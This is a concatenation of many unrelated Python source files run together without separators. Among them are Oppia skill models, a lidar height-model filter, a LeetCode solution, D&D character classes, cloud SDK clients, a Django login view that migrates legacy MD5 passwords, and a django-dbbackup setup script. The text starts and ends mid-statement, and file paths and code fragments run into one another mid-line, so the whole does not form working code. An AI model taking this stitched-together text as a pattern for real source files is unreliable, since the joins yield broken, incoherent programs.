dataframe text_file.write('Mr. Fracture Proofs Woodcarving Features, Final list:' + '\n\n') # Result description text_file.write('Mr. 
Fracture Proof (1st layer): ' + str(l_lmrfp) + '\n\n') # Result list text_file.write('Woodcarving (2nd layer): ' + str(l_lwc) + '\n\n') # Result list text_file.write('####################' + '\n\n') text_file.close() # Close file# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # def make_parent(parent: str) -> str: return parent def make_training_pipeline(display_name: str, dataset_id: str, model_display_name: str) -> google.cloud.aiplatform_v1alpha1.types.training_pipeline.TrainingPipeline: # Use sentiment_max of 4 training_task_inputs_dict = {"sentiment_max": 4} training_task_inputs = to_protobuf_value(training_task_inputs_dict) training_pipeline = { 'display_name': display_name, 'training_task_definition': "gs://google-cloud-aiplatform/schema/trainingjob/definition/automl_text_sentiment_1.0.0.yaml", 'training_task_inputs': training_task_inputs, 'input_data_config': { 'dataset_id': dataset_id }, 'model_to_upload': { 'display_name': model_display_name } } return training_pipeline core/storage/skill/gae_models.py # Copyright 2018 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Models for storing the skill data models.""" from __future__ import absolute_import # pylint: disable=import-only-modules from __future__ import unicode_literals # pylint: disable=import-only-modules from constants import constants from core.platform import models from google.appengine.datastore import datastore_query from google.appengine.ext import ndb (base_models, user_models,) = models.Registry.import_models([ models.NAMES.base_model, models.NAMES.user]) class SkillSnapshotMetadataModel(base_models.BaseSnapshotMetadataModel): """Storage model for the metadata for a skill snapshot.""" pass class SkillSnapshotContentModel(base_models.BaseSnapshotContentModel): """Storage model for the content of a skill snapshot.""" pass class SkillModel(base_models.VersionedModel): """Model for storing Skills. This class should only be imported by the skill services file and the skill model test file. """ SNAPSHOT_METADATA_CLASS = SkillSnapshotMetadataModel SNAPSHOT_CONTENT_CLASS = SkillSnapshotContentModel ALLOW_REVERT = False # The description of the skill. description = ndb.StringProperty(required=True, indexed=True) # The schema version for each of the misconception dicts. misconceptions_schema_version = ndb.IntegerProperty( required=True, indexed=True) # The schema version for each of the rubric dicts. 
rubric_schema_version = ndb.IntegerProperty( required=True, indexed=True) # A list of misconceptions associated with the skill, in which each # element is a dict. misconceptions = ndb.JsonProperty(repeated=True, indexed=False) # The rubrics for the skill that explain each difficulty level. rubrics = ndb.JsonProperty(repeated=True, indexed=False) # The ISO 639-1 code for the language this skill is written in. language_code = ndb.StringProperty(required=True, indexed=True) # The schema version for the skill_contents. skill_contents_schema_version = ndb.IntegerProperty( required=True, indexed=True) # A dict representing the skill contents. skill_contents = ndb.JsonProperty(indexed=False) # The prerequisite skills for the skill. prerequisite_skill_ids = ndb.StringProperty(repeated=True, indexed=False) # The id to be used by the next misconception added. next_misconception_id = ndb.IntegerProperty(required=True, indexed=False) # The id that the skill is merged into, in case the skill has been # marked as duplicate to another one and needs to be merged. # This is an optional field. superseding_skill_id = ndb.StringProperty(indexed=True) # A flag indicating whether deduplication is complete for this skill. # It will initially be False, and set to true only when there is a value # for superseding_skill_id and the merge was completed. all_questions_merged = ndb.BooleanProperty(indexed=True, required=True) @staticmethod def get_deletion_policy(): """Skill should be kept if it is published.""" return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def has_reference_to_user_id(cls, user_id): """Check whether SkillModel snapshots references the given user. Args: user_id: str. The ID of the user whose data should be checked. Returns: bool. Whether any models refer to the given user ID. """ return cls.SNAPSHOT_METADATA_CLASS.exists_for_user_id(user_id) @staticmethod def get_user_id_migration_policy(): """SkillModel doesn't have any field with user ID.""" return base_models.USER_ID_MIGRATION_POLICY.NOT_APPLICABLE @classmethod def get_merged_skills(cls): """Returns the skill models which have been merged. Returns: list(SkillModel). List of skill models which have been merged. """ return [skill for skill in cls.query() if ( skill.superseding_skill_id is not None and ( len(skill.superseding_skill_id) > 0))] def _trusted_commit( self, committer_id, commit_type, commit_message, commit_cmds): """Record the event to the commit log after the model commit. Note that this extends the superclass method. Args: committer_id: str. The user_id of the user who committed the change. commit_type: str. The type of commit. Possible values are in core.storage.base_models.COMMIT_TYPE_CHOICES. commit_message: str. The commit description message. commit_cmds: list(dict). A list of commands, describing changes made in this model, which should give sufficient information to reconstruct the commit. Each dict always contains: cmd: str. Unique command. and then additional arguments for that command. 
""" super(SkillModel, self)._trusted_commit( committer_id, commit_type, commit_message, commit_cmds) committer_user_settings_model = ( user_models.UserSettingsModel.get_by_id(committer_id)) committer_username = ( committer_user_settings_model.username if committer_user_settings_model else '') skill_commit_log_entry = SkillCommitLogEntryModel.create( self.id, self.version, committer_id, committer_username, commit_type, commit_message, commit_cmds, constants.ACTIVITY_STATUS_PUBLIC, False ) skill_commit_log_entry.skill_id = self.id skill_commit_log_entry.put() @staticmethod def get_export_policy(): """Model does not contain user data.""" return base_models.EXPORT_POLICY.NOT_APPLICABLE class SkillCommitLogEntryModel(base_models.BaseCommitLogEntryModel): """Log of commits to skills. A new instance of this model is created and saved every time a commit to SkillModel occurs. The id for this model is of the form 'skill-[skill_id]-[version]'. """ # The id of the skill being edited. skill_id = ndb.StringProperty(indexed=True, required=True) @staticmethod def get_deletion_policy(): """Skill commit log is deleted only if the corresponding collection is not public. """ return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def _get_instance_id(cls, skill_id, version): """This function returns the generated id for the get_commit function in the parent class. Args: skill_id: str. The id of the skill being edited. version: int. The version number of the skill after the commit. Returns: str. The commit id with the skill id and version number. """ return 'skill-%s-%s' % (skill_id, version) @staticmethod def get_export_policy(): """This model is only stored for archive purposes. The commit log of entities is not related to personal user data. """ return base_models.EXPORT_POLICY.NOT_APPLICABLE class SkillSummaryModel(base_models.BaseModel): """Summary model for an Oppia Skill. This should be used whenever the content blob of the skill is not needed (e.g. search results, etc). A SkillSummaryModel instance stores the following information: id, description, language_code, last_updated, created_on, version. The key of each instance is the skill id. """ # The description of the skill. description = ndb.StringProperty(required=True, indexed=True) # The number of misconceptions associated with the skill. misconception_count = ndb.IntegerProperty(required=True, indexed=True) # The number of worked examples in the skill. worked_examples_count = ndb.IntegerProperty(required=True, indexed=True) # The ISO 639-1 code for the language this skill is written in. language_code = ndb.StringProperty(required=True, indexed=True) # Time when the skill model was last updated (not to be # confused with last_updated, which is the time when the # skill *summary* model was last updated). skill_model_last_updated = ndb.DateTimeProperty(required=True, indexed=True) # Time when the skill model was created (not to be confused # with created_on, which is the time when the skill *summary* # model was created). skill_model_created_on = ndb.DateTimeProperty(required=True, indexed=True) version = ndb.IntegerProperty(required=True) @staticmethod def get_deletion_policy(): """Skill summary should be kept if associated skill is published.""" return base_models.DELETION_POLICY.KEEP_IF_PUBLIC @classmethod def has_reference_to_user_id(cls, unused_user_id): """Check whether SkillSummaryModel references the given user. Args: unused_user_id: str. The (unused) ID of the user whose data should be checked. Returns: bool. 
Whether any models refer to the given user ID. """ return False @staticmethod def get_export_policy(): """Model does not contain user data.""" return base_models.EXPORT_POLICY.NOT_APPLICABLE @staticmethod def get_user_id_migration_policy(): """SkillSummaryModel doesn't have any field with user ID.""" return base_models.USER_ID_MIGRATION_POLICY.NOT_APPLICABLE @classmethod def fetch_page(cls, page_size, urlsafe_start_cursor, sort_by): """Returns the models according to values specified. Args: page_size: int. Number of skills to fetch. urlsafe_start_cursor: str. The cursor to the next page. sort_by: str. A string indicating how to sort the result. Returns: 3-tuple(query_models, urlsafe_start_cursor, more). where: query_models: list(SkillSummary). The list of summaries of skills starting at the given cursor. urlsafe_start_cursor: str or None. A query cursor pointing to the next batch of results. If there are no more results, this might be None. more: bool. If True, there are (probably) more results after this batch. If False, there are no further results after this batch. """ cursor = datastore_query.Cursor(urlsafe=urlsafe_start_cursor) sort = -cls.skill_model_created_on if sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'DecreasingCreatedOn']): sort = cls.skill_model_created_on elif sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'IncreasingUpdatedOn']): sort = -cls.skill_model_last_updated elif sort_by == ( constants.TOPIC_SKILL_DASHBOARD_SORT_OPTIONS[ 'DecreasingUpdatedOn']): sort = cls.skill_model_last_updated query_models, next_cursor, more = ( cls.query().order(sort).fetch_page(page_size, start_cursor=cursor)) new_urlsafe_start_cursor = ( next_cursor.urlsafe() if (next_cursor and more) else None) return query_models, new_urlsafe_start_cursor, more rsjones94/riparian-idfilter_dhm.py import os os.environ['GDAL_DATA'] = os.environ['CONDA_PREFIX'] + r'\Library\share\gdal' os.environ['PROJ_LIB'] = os.environ['CONDA_PREFIX'] + r'\Library\share' import itertools import time from scipy import ndimage import ogr import gdal import numpy as np from skimage import measure def isolated_feature_filter(a): """ Removes isolated pixels. Meant to be used with a 3x3 window Args: a: the flattened form of an n x m numpy array Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it #print('Pixel is gucci') return 0 #print('Casting') #print(b) b = b > 0 # cast to Bools. If DHM is over 0, True #print(b) if not b.sum() > 1: # if there are no neighboring pixels with DHM over 0 #print('Removing') return 0 else: #print('Pixel passed muster') return center_val def density_filter(a, thresh=0.3): """ Only keep pixels if over thresh% of pixels in the window are > 0 Args: a: the flattened form of an n x m numpy array thresh: filtering threshold Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it return 0 b = b > 0 # cast to Bools. 
If DHM is over 0, True density = b.sum() / edge_length**2 if density >= thresh: return center_val else: return 0 def linear_feature_filter(a): """ Removes linear features based on the algorithm described in Characterizing urban surface cover and structure with airborne lidar technology , , , , and Args: a: the flattened form of an n x m numpy array Returns: either 0 or the pixel value """ edge_length = int(len(a) ** 0.5) b = a.reshape((edge_length, edge_length)) center = int((edge_length - 1) / 2) center_val = b[center, center] if center_val <= 0: # if the value is 0 we can just move on. If it's less than 0 (should not happen in a dhm) then repair it return 0 b = b > 0 # cast to Bools. If DHM is over 0, True # data = np.array([[x, y, b[x, y]] for x, y in coords if not np.isnan(b[x, y])]) # measure.profile_line # coords = itertools.product(range(edge_length), range(edge_length)) # all coordinates in the matrix start_coords = list(itertools.product([0], range(edge_length))) start_coords.extend(list(itertools.product(range(1, edge_length - 1), [edge_length - 1]))) end_coords = [(edge_length - 1 - a, edge_length - 1 - b) for a, b in start_coords] n_filled = b.sum() # total number of nonzero DHM cells i = 0 for start, end in zip(start_coords, end_coords): i += 1 intercepted = measure.profile_line(b, start, end, linewidth=1) n_intercepted = intercepted.sum() frac_filled_on_line = (n_intercepted / len(intercepted)) frac_filled_but_not_on_line = (n_filled - n_intercepted) / edge_length ** 2 # second part of conditional: are there a lot of points aligned linearly? # first part of conditional: are there not a lot of surrounding pixels? # if both are true, the feature is probably a powerline or building edge if frac_filled_but_not_on_line < 40/81 and frac_filled_on_line >= (3.5 / 9): print(f'FILTERING PT. N on line: {n_intercepted} out of {len(intercepted)}. {start}, {end}') print(f'Checked {i} lines, value squashed') return 0 #print(f'Checked {i} lines, value passed') return center_val def filter_dhm(dhm, out_file, filter_size=9, technique='density'): """ Remove linear and isolated pixels from a DHM Args: dhm: path to input digital height model out_file: output path filter_size: edge length of pixel. Must be odd and over 1. 9. Is preferred. Used only for linear feature detection; isolated pixel detection window locked at 3x3 technique: a string indicating the type method of feature removal. 
'density' or 'linear' Returns: Nothing """ start = time.time() if filter_size % 2 != 1 or not filter_size > 1: raise Exception('Filter size must be odd and greater than 1') print(f'Removing erroneous features from DHM: {out_file}') print('Reading dhm') img = gdal.Open(dhm) ds = img.GetGeoTransform() ulx, xres, xskew, uly, yskew, yres = ds nx = img.RasterXSize ny = img.RasterYSize driver = gdal.GetDriverByName("GTiff") outdata = driver.Create(out_file, nx, ny, 1, gdal.GDT_Float32) outdata.SetGeoTransform(img.GetGeoTransform()) ##sets same geotransform as input outdata.SetProjection(img.GetProjection()) ##sets same projection as input in_band = img.GetRasterBand(1) in_array = in_band.ReadAsArray() dhm_nodata_val = in_band.GetNoDataValue() print(f'NoData: {dhm_nodata_val}') filtered_dhm = in_array if technique == 'linear': print('Removing isolated pixels') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, isolated_feature_filter, size=(3, 3)) for i in range(1): print(f'Removing linear features: {i+1}') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, linear_feature_filter, size=(filter_size, filter_size)) print('Removing isolated pixels... again') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, isolated_feature_filter, size=(3, 3)) elif technique == 'density': print('Applying density threshold') filtered_dhm = ndimage.filters.generic_filter(filtered_dhm, density_filter, size=(filter_size, filter_size), extra_keywords={'thresh': 0.3}) else: raise Exception(f'Technique must be "density" or "linear"') print('Writing') outdata.GetRasterBand(1).WriteArray(filtered_dhm) outdata.GetRasterBand(1).SetNoDataValue(dhm_nodata_val) ##if you want these values transparent outdata.FlushCache() ##saves to disk!! outdata = None band = None ds = None print('DHM processing complete') final = time.time() elap = round(final - start, 2) print(f'Processing time: {round(elap / 60, 2)} minutes') """ nums = [9] for i in nums: #dhm = r'F:\gen_model\texture_testing\dhm_mod\raw_dhm.tif' dhm = r'F:\gen_model\study_areas\100301011309\study_LiDAR\products\mosaic\dighe.tif' # is the DSM better? gives nice texture in foresty but single returny areas, though raisins are a problem filt_size = i out = f'F:\\gen_model\\texture_testing\\dhm_mod\\processed_dhm_filter{filt_size}.tif' filter_dhm(dhm, out, filter_size=filt_size, technique='density') """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = "" __doc__ = r""" Created on 18-01-2021 """ import numpy from draugr.python_utilities.powers import next_pow_2 __all__ = ["zero_pad_to_power_2", "zero_pad_to"] def zero_pad_to(signal: numpy.ndarray, length: int) -> numpy.ndarray: """ """ return numpy.pad( signal, (0, length - len(signal)), "constant", constant_values=(0, 0) ) def zero_pad_to_power_2(signal: numpy.ndarray) -> numpy.ndarray: """ """ return zero_pad_to(signal, next_pow_2(len(signal))) if __name__ == "__main__": aasd = numpy.arange(8 + 1) print(aasd, aasd.shape) padded = zero_pad_to_power_2(aasd) print(padded, padded.shape) import unittest from typing import List import utils # O(n^2) time. O(n^2) space. DP.
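# A sketch of the recurrence as I read the code below (my wording, not the author's):
# dp[j][k] holds the length of the longest Fibonacci-like subsequence ending with the
# pair (A[j], A[k]); if x = A[k] - A[j] occurs at some index i with x < A[j], then
# dp[j][k] = dp[i][j] + 1, otherwise it stays at the base length of 2.
# Worked example: A = [1, 2, 3, 4, 5, 6, 7, 8] -> 1, 2, 3, 5, 8 gives the answer 5.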
class Solution: def lenLongestFibSubseq(self, A: List[int]) -> int: result = 0 indexes = {x: i for i, x in enumerate(A)} # dp[i][j]: longest path ending in [i, j] dp = [[2] * len(A) for _ in range(len(A))] for k, z in enumerate(A): for j in range(k): y = A[j] x = z - y if x >= y: continue i = indexes.get(x, -1) if i == -1: continue dp[j][k] = dp[i][j] + 1 result = max(result, dp[j][k]) return result class Test(unittest.TestCase): def test(self): cases = utils.load_test_json(__file__).test_cases for case in cases: args = str(case.args) actual = Solution().lenLongestFibSubseq(**case.args.__dict__) self.assertEqual(case.expected, actual, msg=args) if __name__ == '__main__': unittest.main() top_twenty = ["zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"] tens = ["", "", "twenty", "thirty", "forty", "fifty", "sixty", "seventy", "eighty", "ninety"] def num_digits(n): # check for if 0 <= n < 20: return top_twenty[n] elif 20 <= n < 100: return tens[n // 10] + (top_twenty[n % 10] if (n % 10 != 0) else "") elif 100 <= n < 1000: return top_twenty[n // 100] + "hundred" + (("and" + num_digits(n % 100)) if (n % 100 != 0) else "") elif 1000 <= n < 1000000: return num_digits(n // 1000) + "thousand" + (num_digits(n % 1000) if (n % 1000 != 0) else "") else: raise ValueError() if __name__ == "__main__": ans = sum(len(num_digits(i)) for i in range(1, 1001)) print(ans)app/attendance/attendance_histogram.py import datetime from pprint import pprint import matplotlib.pyplot as plt import pandas as pd from attendance.bosscontrol import load_attendance_time, load_employees def send_attendance_histogram(time_frame: int, date=datetime.datetime): collection = load_employees() load_attendance_time(collection, date) data = {'attendance_time': [], 'people': []} for item in collection.get_collection().values(): attendance = item.get_attendance() if attendance.is_absent(date): continue attendance.sort() data['attendance_time'].append(attendance.get_first(date)) data['attendance_time'].append(attendance.get_last(date)) data['people'].append(1) data['people'].append(1) if len(data['attendance_time']) == 0: return data['attendance_time'].insert(0, date.replace(hour=6, minute=0, second=0)) data['attendance_time'].append(date.replace(hour=23, minute=59, second=59)) data['people'].insert(0, 0) data['people'].append(0) data['attendance_time'].sort() df = pd.DataFrame.from_dict(data) df.index = df['attendance_time'] del df['attendance_time'] df_resample = df.resample("%iT" % time_frame) df_resample = df_resample.sum() df_resample.plot() plt.title('When you come to office') plt.xlabel('Time') plt.ylabel('People Amount') plt.grid(axis='x') pic = plt.savefig('figure1.pdf') t = 1 from math import floor class Entity(): def __init__(self, **attributes): self.ability = { "Strength": int(attributes['strength']), "Dexterity": int(attributes['dexterity']), "Constitution": int(attributes['constitution']), "Intelligence": int(attributes['intelligence']), "Wisdom": int(attributes['wisdom']), "Charisma": int(attributes['charisma']) } self.combat = { "Armor Class": int(attributes['armorclass']), "Hit Points": int(attributes['hitpoints']), "Max HP": int(attributes['maxhitpoints']), "Hit Dice": str(attributes['hitdice']), "Speed": int(attributes['speed']) } self.languages = attributes['language'] self.senses = { "Vision": str(), "Perception": int() } self.skills = list(attributes['skills']) def 
abilitymod(self, ability): return floor((ability -10) / 2) class Player(Entity): def __init__(self, attributes, **playerinfo): super().__init__(**attributes) self.name = str(playerinfo['name']) self.playerclass = playerinfo['class'] self.level = int(playerinfo['level']) self.race = str(playerinfo['race']) self.alignment = str(playerinfo['alignment']) self.experience = int(playerinfo['experience']) self.background = str(playerinfo['background']) self.combat['Weapons'] = dict(playerinfo['weapons']) self.features = list(playerinfo['features']) self.attacks = list(playerinfo['attacks']) self.spellslots = dict(playerinfo['spellslots']) self.currentslots = dict(playerinfo['currentslots']) self.spellsknown = dict(playerinfo['spellsknown']) self.gear = list(playerinfo['gear']) self.consumables = dict(playerinfo['consumables']) self.proficencybonus = int(playerinfo['proficiency']) self.senses['Perception'] = 10 + self.abilitymod(self.ability['Wisdom']) if 'Perception' in self.skills: self.senses['Perception'] = self.senses['Perception'] + self.proficencybonus class Monster(Entity): def __init__(self, attributes, **monsterinfo): super().__init__(**attributes) self.name = str(monsterinfo['name']) self.damageimmunities = list(monsterinfo['damageimmunities']) self.conditionimmuities = list(monsterinfo['conditionimmunities']) self.challenge = str(monsterinfo['challengerating']) self.xp = int(monsterinfo['xp']) self.traits = list(monsterinfo['traits']) self.combat['actions'] = dict(monsterinfo['actions']) self.senses['Perception'] = int(monsterinfo['perception']) # coding=utf8 # Copyright 2018 JDCLOUD.COM # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # NOTE: This class is auto generated by the jdcloud code generator program.
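# Illustrative usage only (my own example, not part of the generated SDK):
#   build = SimpleBuild(uuid='6f0c...', jobName='nightly-build', status='FINISHED', duration=42)
#   print(build.jobName, build.status)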
class SimpleBuild(object): def __init__(self, uuid=None, jobName=None, createdAt=None, compilerType=None, status=None, duration=None): """ :param uuid: (Optional) UUID of the build task :param jobName: (Optional) Name of the job the build task belongs to :param createdAt: (Optional) Creation time of the build task :param compilerType: (Optional) Build type :param status: (Optional) Run status of the build task :param duration: (Optional) Run time of the build task """ self.uuid = uuid self.jobName = jobName self.createdAt = createdAt self.compilerType = compilerType self.status = status self.duration = duration backend/isic/__init__.py from .isic_crawler import ISIC_getdata from knodle.trainer.config import TrainerConfig from knodle.trainer.baseline.majority import MajorityVoteTrainer, MajorityConfig from knodle.trainer.knn_aggregation.knn import KNNAggregationTrainer, KNNConfig from knodle.trainer.snorkel.snorkel import SnorkelKNNAggregationTrainer, SnorkelTrainer, SnorkelConfig, SnorkelKNNConfig from knodle.trainer.wscrossweigh.wscrossweigh import WSCrossWeighTrainer, WSCrossWeighConfig from knodle.trainer.auto_trainer import AutoTrainer from knodle.trainer.auto_config import AutoConfig from django.forms import ModelForm from .models import Message class MessageCreateForm(ModelForm): class Meta: model = Message fields = ['text'] gradient/api_sdk/clients/tensorboards_client.py """ Tensorboard logic related client handler. Remember that in code snippets all highlighted lines are required; other lines are optional. """ from .base_client import BaseClient from .. import repositories, models class TensorboardClient(BaseClient): """ Client to handle tensorboard related actions. How to create instance of tensorboard client: .. code-block:: python :linenos: :emphasize-lines: 4 from gradient import TensorboardClient tb_client = TensorboardClient( api_key='your_api_key_here' ) """ def create( self, image=None, username=None, password=None, instance_type=None, instance_size=None, instances_count=None, experiments=None, ): """ Method to create tensorboard in paperspace gradient. Example create tensorboard: .. code-block:: python :linenos: :emphasize-lines: 2 tb_id = tb_client.create( experiments=['some_experiment_id'], image='tensorflow/tensorflow:latest-py3', username='your_username', password='', instance_type='cpu', instance_size='small', instances_count=1 ) :param str image: your tensorboard will run with this image. By default it will be run with ``tensorflow/tensorflow:latest-py3`` :param str username: if you wish to limit access to your tensorboard with base auth then provide username :param str password: if you wish to limit access to your tensorboard with base auth then provide password :param str instance_type: type of instance on which you want to run tensorboard. Available choices: .. code-block:: cpu gpu By default we use ``cpu`` instance type. :param str instance_size: size of instance on which you want to run tensorboard. Available choices: .. code-block:: small medium large By default we use ``small`` instance size. :param int instances_count: on how many machines you want to run tensorboard. By default ``1`` is used. :param list experiments: list of experiments that you wish to add to tensorboard. To create tensorboard you need to provide at least one experiment id. This field is **required**.
:return: Return tensorboard id :rtype: str :raises: ResourceFetchingError: When there is a problem with the response from the API """ tensorboard = models.Tensorboard( image=image, username=username, password=password, instance=models.Instance( type=instance_type, size=instance_size, count=instances_count, ), experiments=experiments, ) repository = self.build_repository(repositories.CreateTensorboard) tensorboard_id = repository.create(tensorboard) return tensorboard_id def get(self, id): """ Method to get tensorboard details. Example get tensorboard details: .. code-block:: python :linenos: :emphasize-lines: 2 tb = tb_client.get( id='your_tb_id' ) :param str id: Tensorboard id of which you want to get details :return: Tensorboard object if found :rtype: None|Tensorboard :raises: ResourceFetchingError: When there is a problem with the response from the API """ repository = self.build_repository(repositories.GetTensorboard) tensorboard = repository.get(id=id) return tensorboard def list(self): """ Method to list your active tensorboards. Example usage: .. code-block:: python :linenos: tb_list = tb_client.list() :return: list of active tensorboards :rtype: list[models.Tensorboard] :raises: ResourceFetchingError: When there is a problem with the response from the API """ repository = self.build_repository(repositories.ListTensorboards) tensorboards = repository.list() return tensorboards def add_experiments(self, id, added_experiments): """ Method to add experiments to existing tensorboard. Example usage: .. code-block:: python :linenos: :emphasize-lines: 2, 3 tb = tb_client.add_experiments( id='your_tb_id', added_experiments=['new_experiment_id', 'next_new_experiment_id'] ) :param str id: tensorboard id to which you want to add experiments :param list added_experiments: list of experiment ids which you want to add to tensorboard :return: updated tensorboard :rtype: Tensorboard :raises: ResourceFetchingError: When there is a problem with the response from the API """ repository = self.build_repository(repositories.UpdateTensorboard) tensorboard = repository.update( id=id, added_experiments=added_experiments) return tensorboard def remove_experiments(self, id, removed_experiments): """ Method to remove experiments from existing tensorboard. Example usage: .. code-block:: python :linenos: :emphasize-lines: 2, 3 tb = tb_client.remove_experiments( id='your_tb_id', removed_experiments=['experiment_id', 'next_experiment_id'] ) :param str id: tensorboard id from which you want to remove experiments :param list removed_experiments: list of experiment ids which you want to remove from tensorboard :return: updated tensorboard :rtype: Tensorboard :raises: ResourceFetchingError: When there is a problem with the response from the API """ repository = self.build_repository(repositories.UpdateTensorboard) tensorboard = repository.update( id=id, removed_experiments=removed_experiments) return tensorboard def delete(self, id): """ Method to delete tensorboard. Example usage: ..
code-block:: python :linenos: :emphasize-lines: 2 tb_client.delete( id='your_tb_id' ) :param str id: Tensorboard id which you want to delete """ repository = self.build_repository(repositories.DeleteTensorboard) repository.delete(id_=id) import time if __name__ == '__main__': s_time = time.time() for i in range(3): print("{:04d}".format(i+1)) time.sleep(1.0) e_time = time.time() print("--time: {:3.4f} [seconds]".format(e_time - s_time)) # Copyright (c) 2022, SK and Contributors # See license.txt # import frappe import unittest class TestMentor(unittest.TestCase): pass from hashlib import md5 from django.conf import settings from django.contrib import messages from django.contrib.auth import ( authenticate, login as login_auth, views as authviews, ) from django.contrib.staticfiles.storage import staticfiles_storage from django.http import ( HttpResponseRedirect, HttpResponseServerError, ) from django.shortcuts import render from django.urls import reverse_lazy from django.utils import timezone from django.views.decorators.http import require_http_methods from ..forms.authentication import LoginForm, PasswordResetForm from ..forms.signup import SignUpForm from ..users import migrate_user, logout_user_without_losing_session @require_http_methods(["POST"]) def logout(request): referer = request.META.get("HTTP_REFERER", "/") logout_user_without_losing_session(request) return HttpResponseRedirect(referer) @require_http_methods(["POST"]) def login(request): """ Log user in from one of the two sources: * Django's normal authentication framework * Legacy DDCZ database If user is able to log in from legacy database table and does not have corresponding user object, create it for him. After this version of the site becomes the default one, also delete User's password from the legacy table and consider them "migrated". Note that it is unusual for this form to handle only POST data and creates a bit of a weird experience with the form--but given the form is present on each and every page, it feels better to do this than to feed this kind of POST handling to every view. """ referer = request.META.get("HTTP_REFERER", "/") form = LoginForm(request.POST) if not form.is_valid(): messages.error(request, f"Špatně vyplněný formulář: {form.errors.as_text()}") return HttpResponseRedirect(referer) from ddcz.models import UserProfile user = authenticate( username=form.cleaned_data["nick"], password=form.cleaned_data["password"] ) if user is not None: login_auth(request, user) user.profile.last_login = timezone.now() user.profile.save() return HttpResponseRedirect(referer) else: m = md5() # TODO: Encoding needs verification # This needs to be done since passwords, of course, can contain # non-ascii characters that affect hashing m.update(form.cleaned_data["password"].encode("cp1250")) old_insecure_hashed_password = m.hexdigest() try: profile = UserProfile.objects.get(nick=form.cleaned_data["nick"]) except UserProfile.DoesNotExist: messages.error(request, "Špatný nick a nebo heslo") return HttpResponseRedirect(referer) if profile.password_v1 != old_insecure_hashed_password: messages.error(request, "Špatný nick a nebo heslo") return HttpResponseRedirect(referer) else: migrate_user(profile=profile, password=form.cleaned_data["password"]) user = authenticate( username=form.cleaned_data["nick"], password=form.cleaned_data["password"], ) if not user: return HttpResponseServerError( "Chyba během migrace na nový systém!
Prosím kontaktujte Almada" ) login_auth(request, user) # TODO: For first-time login, bunch of stuff happens. Inspect legacy login and reimplement return HttpResponseRedirect(referer) class PasswordResetView(authviews.PasswordResetView): template_name = "users/password-reset.html" success_url = reverse_lazy("ddcz:password-reset-done") from_email = settings.DDCZ_TRANSACTION_EMAIL_FROM email_template_name = "users/password-reset-email.html" form_class = PasswordResetForm class PasswordResetDoneView(authviews.PasswordResetDoneView): template_name = "users/password-reset-done.html" class PasswordResetConfirmView(authviews.PasswordResetConfirmView): template_name = "users/password-change.html" success_url = reverse_lazy("ddcz:password-change-done") class PasswordResetCompleteView(authviews.PasswordResetCompleteView): template_name = "users/password-change-done.html" def sign_up(request): form = SignUpForm() if request.method == "POST" and request.POST.get("submit"): form = SignUpForm(request.POST) if form.is_valid(): form.save() return render( request, "users/sign_up_after.html", {"addressing": form.cleaned_data["salutation"]}, ) return render( request, "users/sign_up.html", { "sign_up_form": form, "reg_script": staticfiles_storage.url("common/js/main.js"), "reg_style": staticfiles_storage.url("common/css/registration.css"), "seal_image": staticfiles_storage.url( "common/img/registration-seal-gold.svg" ), }, ) #!/usr/bin/env python from setuptools import setup, find_packages import dbbackup def get_requirements(): return open('requirements.txt').read().splitlines() def get_test_requirements(): return open('requirements-tests.txt').read().splitlines() keywords = [ 'django', 'database', 'media', 'backup', 'amazon', 's3', 'dropbox', ] setup( name='django-dbbackup', version=dbbackup.__version__, description=dbbackup.__doc__, author=dbbackup.__author__, author_email=dbbackup.__email__, install_requires=get_requirements(), tests_require=get_test_requirements(), license='BSD', url=dbbackup.__url__, keywords=keywords, packages=find_packages(), classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Environment :: Console', 'Framework :: Django', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Topic :: Database', 'Topic :: System :: Archiving', 'Topic :: System :: Archiving :: Backup', 'Topic :: System :: Archiving :: Compression' ], ) from .tag.temperature 